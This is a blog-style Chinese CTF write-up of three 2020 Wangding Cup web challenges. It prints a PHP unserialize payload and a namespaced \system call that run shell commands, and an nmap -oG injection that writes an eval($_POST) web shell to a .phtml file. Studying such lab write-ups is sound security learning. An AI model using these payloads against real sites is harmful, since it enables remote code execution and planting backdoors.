[网鼎杯 2020 朱雀组]WEB 复现

BUU很快上了复现环境,来尝试坐下

[网鼎杯 2020 朱雀组]phpweb

打开靶机是一张懒狗图

查看源码发现

发现是类似与xxx(xxx)的参数,抓包随便改动一下出现了报警

发现是一个call_user_func

所以尝试构造一下函数读一下源码

额编辑器又抽风了,所以随便贴下

源码审计后可以发现过滤了很多关键的系统函数

传入参数func与p,如果func不为空且不再黑名单内,调用gettime函数,然后传入call_user_func创建用户函数,并用gettype判断函数类型,如果是string就返回结果。

有一个test类,有_destruct魔法函数

然后没过滤unserialize函数,根据刚刚的经验。直接赋值给func和p函数直接打进去就行

O:4:”Test”:2:{s:1:”p”;s:4:”ls /”;s:4:”func”;s:6:”system”;}

有非预期解

用命名空间直接执行system函数

func=\system&p=ls /

发现flag不在根目录

找一下 func=\system&p=find / -name *flag* 在tmp目录 直接读


[网鼎杯 2020 朱雀组]Nmap

测了一会儿也没啥思路,以为是ssrf但是也不太像。。。

之后发现是BUUCTF 2018 Online Tool的类似题

直接payload拿来用。发现返回了hack。测一手过滤了php以及一些常用php后缀。但没过滤phtml

那不用php呗。短标签+phtml

host=’ <? @eval($_POST[“hack”]);?> -oG 1.phtml ‘

会转圈,但是直接访问 shell是写进去了。


[网鼎杯 2020 朱雀组]Think Java

java题,给了附件。尝试做一下

发表评论

邮箱地址不会被公开。 必填项已用*标注